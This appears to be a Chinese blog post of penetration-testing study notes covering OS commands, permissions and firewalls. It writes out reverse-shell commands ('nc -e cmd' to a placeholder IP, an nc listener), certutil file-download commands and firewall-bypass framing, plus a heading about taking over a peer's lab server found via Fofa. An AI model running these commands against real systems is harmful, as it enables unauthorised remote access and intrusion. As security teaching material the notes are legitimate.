操作系统

操作系统-用途&命令&权限&用户&防火墙
1、个人计算机&服务器用机
2、windows&Linux常见命令
3、文件权限&服务权限&用户权限
4、系统用户&用户组&服务用户等分类
5、自带防火墙出站&入站规则策略协议

实用案例1:文件上传下载-解决无图形化&解决数据传输
Linux:wget curl python ruby perl java等
Windows: Powershell Certutil Bitsadmin msiexec mshta rundll32等

实用案例2:反弹Shell命令-解决数据回显&解决数据通讯(反弹就是将权限给别人)
useradd passwd
测试Linux系统添加用户或修改命令交互回显

结合案例1:防火墙绕过-正向链接&反向链接&内网服务器
1、内网:
内网->用户
nc -e cmd ip地址 端口

就是把本机的cmd权限给这个ip的窗口

nc -lvvp 监听的端口号

2.防火墙
服务器主机<->另一个服务器主机
如果开了防火墙,是不行的
入站严格出站宽松
nc -e cmd ip地址 端口(就是正向链接)
主动把权限给出去
反向链接就是别人找你

结合案例-Fofa拿下同行Pikachu服务器
文件下载&反弹shell:
certuil -urlcache -split -f ip地址
nc -e cmd ip地址

在这里插入图片描述
找个在线的靶场

在这里插入图片描述

点赞(0) 打赏

评论列表 共有 0 条评论

暂无评论

微信公众账号

微信扫一扫加关注

发表
评论
返回
顶部